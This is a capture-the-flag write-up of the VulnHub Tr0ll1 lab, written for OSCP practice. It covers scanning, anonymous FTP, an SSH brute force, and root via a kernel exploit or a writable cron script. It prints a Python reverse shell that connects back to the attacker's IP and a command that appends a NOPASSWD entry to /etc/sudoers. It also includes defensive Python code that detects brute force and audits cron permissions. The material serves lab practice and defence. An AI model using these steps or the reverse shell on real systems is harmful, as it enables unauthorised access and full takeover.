Preface
OSCP prep, OSCP series: the Tr0ll1 lab, with two privilege-escalation paths, FTP anonymous login, SSH brute forcing, Ubuntu kernel privilege escalation, and a cron job
Difficulty: easy
https://www.vulnhub.com/entry/tr0ll-1,100/
nmap
Host discovery
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:19 CST
Nmap scan report for 10.10.10.1
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00034s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.141
Host is up (0.00038s latency).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00028s latency).
MAC Address: 00:50:56:FB:0C:2B (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds
Port scan
└─# nmap --min-rate 10000 -p- 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:20 CST
Nmap scan report for 10.10.10.141
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds
Detailed port scan
└─# nmap -sV -sT -sC -O -p21,22,80 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:21 CST
Nmap scan report for 10.10.10.141
Host is up (0.00060s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.10.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
vuln script scan
└─# nmap --script=vuln -p21,22,80 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:22 CST
Nmap scan report for 10.10.10.141
Host is up (0.00053s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 321.30 seconds
Information gathering
FTP, port 21
nmap showed that anonymous login is allowed
Download the file and take a look
└─# strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap
This reveals a directory, /sup3rs3cr3tdirlol
Web page, port 80
Looking at the page source, the image is named hacker; download it and examine it
Nothing useful was found in the source
Directory scan
Same results as the nmap scan
/robots.txt
/secret/
/sup3rs3cr3tdirlol
Download the files in the directory
Found the directory 0x0856BF
Found two folders
Contents of the file that may hold usernames
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Contents of the file that may hold the password
Good_job_:)
Exploitation
SSH brute force
Try brute-forcing SSH with the following usernames
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
maleus
ps-aux
felux
Eagle11
root
Passwords
Good_job_:)
good_job_:)
Pass.txt
password
Got a valid username and password
overflow/Pass.txt
SSH login succeeded
Privilege escalation
Ubuntu kernel privilege escalation
Check the version
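The brute-force run above is visible on the target in sshd's auth.log. As an added example (not from the original post), a small Python detector that flags a source IP with five or more failed password attempts inside a one-minute window and records the account that then succeeded; the log lines are constructed, modelled on the syslog format Ubuntu 14.04 uses.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches the sshd password-auth lines written to /var/log/auth.log on Ubuntu 14.04.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_sshd_events(lines, year=2025):
    """Yield (timestamp, result, user, ip) per matching line; syslog omits the year."""
    for line in lines:
        m = SSHD_RE.match(line.rstrip())
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            yield ts, m.group("result"), m.group("user"), m.group("ip")

def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside a sliding window.

    A later successful login from a flagged IP is recorded as the guessed
    account, which is the event an incident responder actually cares about.
    """
    recent = defaultdict(list)
    alerts = {}
    for ts, result, user, ip in parse_sshd_events(lines):
        if result == "Failed":
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_seconds]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                entry = alerts.setdefault(ip, {"max_failures": 0, "guessed_user": None})
                entry["max_failures"] = max(entry["max_failures"], len(recent[ip]))
        elif ip in alerts:
            alerts[ip]["guessed_user"] = user
    return alerts

# Constructed sample log: a wordlist run from the attacking host, then one stray failure.
SAMPLE_AUTH_LOG = """\
Feb  9 12:30:01 troll sshd[1501]: Failed password for invalid user genphlux from 10.10.10.128 port 51000 ssh2
Feb  9 12:30:02 troll sshd[1503]: Failed password for invalid user usmc8892 from 10.10.10.128 port 51001 ssh2
Feb  9 12:30:02 troll sshd[1505]: Failed password for invalid user blawrg from 10.10.10.128 port 51002 ssh2
Feb  9 12:30:03 troll sshd[1507]: Failed password for invalid user wytshadow from 10.10.10.128 port 51003 ssh2
Feb  9 12:30:03 troll sshd[1509]: Failed password for overflow from 10.10.10.128 port 51004 ssh2
Feb  9 12:30:04 troll sshd[1511]: Accepted password for overflow from 10.10.10.128 port 51005 ssh2
Feb  9 12:45:10 troll sshd[1600]: Failed password for overflow from 10.10.10.1 port 40000 ssh2
"""

def run_demo():
    return detect_bruteforce(SAMPLE_AUTH_LOG.splitlines())
```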
overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
overflow@troll:/$ lsb_release
No LSB modules are available.
overflow@troll:/$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
The version is quite old, so try a kernel exploit; a search turns up one that fits well
The exploit works
Got root
Cron job
A cron job exists; locate it with the following commands
find / -uid 0 -perm -o+w -type f 2>/dev/null | grep -v -E '/proc|/sys'
find / -name "*cronlog*" 2>/dev/null
Result
/lib/log/cleaner.py
Open it with vim
and write the following reverse-shell script into it
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.10.128",6666));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
Alternatively, grant the user full sudo rights directly and then run sudo /bin/bash
to get root straight away (the sudoers keyword is ALL, in upper case)
echo "overflow ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
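The misconfiguration behind this path is a cron-run script (cleaner.py, found with the find commands above) that any user can write to. As an added example (not from the original post), a Python audit that parses /etc/crontab-style entries, resolves the file an interpreter command really executes, and reports targets that group or world can modify; the crontab text and files are a constructed fixture in a temporary directory.

```python
import os
import stat
import tempfile

# Interpreters whose first non-option argument is the file that really gets executed.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl"}

def cron_command_target(command):
    """Return the path a crontab command executes (the script, not the interpreter)."""
    argv = command.split()
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS:
        return next((a for a in argv[1:] if not a.startswith("-")), None)
    return argv[0]

def audit_system_crontab(crontab_text):
    """Flag /etc/crontab entries whose target is writable by group or world.

    Entries have five time fields, the run-as user, then the command.
    Returns a list of (user, target, problem) tuples.
    """
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        target = cron_command_target(command)
        if target is None or not os.path.isabs(target) or not os.path.isfile(target):
            continue
        mode = os.stat(target).st_mode
        if mode & stat.S_IWOTH:
            findings.append((user, target, "world-writable"))
        elif mode & stat.S_IWGRP:
            findings.append((user, target, "group-writable"))
    return findings

def run_demo():
    """Constructed fixture: a root job running a 0777 cleaner script beside a sane one."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "cleaner.py"), os.path.join(d, "rotate.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("# placeholder\n")
        os.chmod(path, mode)
    crontab = "SHELL=/bin/sh\n* * * * * root python %s\n0 3 * * * root %s\n" % (bad, good)
    return audit_system_crontab(crontab)
```

The fix on a real host is the inverse of what the audit flags: make the script root-owned and 0755 (or 0644 for a non-executable helper) so only root can change what root's cron runs.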